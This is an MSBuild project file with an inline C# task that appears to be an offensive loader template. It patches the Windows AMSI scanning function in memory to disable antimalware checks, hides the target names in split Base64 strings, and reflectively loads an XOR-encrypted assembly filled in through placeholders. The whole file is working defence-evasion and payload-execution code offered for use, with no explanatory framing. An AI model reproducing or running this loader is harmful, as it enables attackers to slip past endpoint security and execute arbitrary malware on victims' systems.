<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="c">
   <c/>
  </Target>
  <UsingTask
    TaskName="c"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
  <Task>
    <Reference Include="System.Management.Automation"/>
      <Code Type="Class" Language="cs">
        <![CDATA[
using System;
using System.Reflection;
using System.Text;
using System.Runtime.InteropServices;

namespace csharp
{
    class Program
    {
        [DllImport("ke" + "rne" + "l32")]
        private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("ke" + "rne" + "l32")]
        private static extern IntPtr LoadLibrary(string name);

        [DllImport("ke" + "rne" + "l32")]
        private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("user32.dll")]
        public static extern bool SetProcessDPIAware();

        private static void CopyData(byte[] dataStuff, IntPtr somePlaceInMem, int holderFoo = 0)
        {
            Marshal.Copy(dataStuff, holderFoo, somePlaceInMem, dataStuff.Length);
        }
        private static void Thing()
        {
            try
            {
                var fooBar = LoadLibrary(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS" + "5kbGw=")));
                IntPtr addr = GetProcAddress(fooBar, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5" + "CdWZmZXI=")));
                uint magicValue = 0x40;
                uint someNumber = 0;

                if (System.Environment.Is64BitOperatingSystem)
                {
                    var bigBoyBytes = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };

                    VirtualProtect(addr, (UIntPtr)bigBoyBytes.Length, magicValue, out someNumber);
                    CopyData(bigBoyBytes, addr);
                }
                else
                {
                    var smallBoyBytes = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

                    VirtualProtect(addr, (UIntPtr)smallBoyBytes.Length, magicValue, out someNumber);
                    CopyData(smallBoyBytes, addr);

                }
                Console.WriteLine("[+] Patched Ayy Emm Ess Eye!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Couldn't patch Ayy Emm Ess Eye :(");
                Console.WriteLine("[!] {0}", ex.Message);
            }
        }
        private static byte[] Zor(byte[] input, byte[] key)
        {
            byte[] mixed = new byte[input.Length];
            for (int i = 0; i < input.Length; i++)
            {
                mixed[i] = (byte)(input[i] ^ key[i % key.Length]);
            }
            return mixed;
        }
        public static void Main(string[] args)
        {
            Assembly assembly = null;
            bool foundMain = false;
            bool execMain = false;

            Thing();
            SetProcessDPIAware();

            try
            {
                string data = "~~ASSEMBLY~~";
                string key = "~~KEY~~";
                assembly = Assembly.Load(Zor(Convert.FromBase64String(data), Encoding.UTF8.GetBytes(key)));
            }
            catch (Exception e)
            {
                Console.WriteLine("[!] Could not load assembly. Returned the following error:\n\n");
                Console.WriteLine(e);
                Environment.Exit(1);
            }
            
            if (args.Length == 0)
            {
                Console.WriteLine("[*] Running assembly with no arguments");
            }
            else
            {
                Console.WriteLine("[*] Running assembly with arguments: " + string.Join(" ", args));
            }
            try {
                var output = assembly.EntryPoint.Invoke(null, new object[] { args });
                Console.WriteLine(output);
            }
            catch (Exception e) {
                Console.WriteLine("[!] Could not invoke assembly. Returned the following error:\n\n");
                Console.WriteLine(e);
                Environment.Exit(1);
            }
        }
    }
    public class c : Microsoft.Build.Utilities.Task, Microsoft.Build.Framework.ITask
    {
        public override bool Execute()
        {
            Program.Main(new string[] {~~ARGS~~});
            return true;
        }
   }
}
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

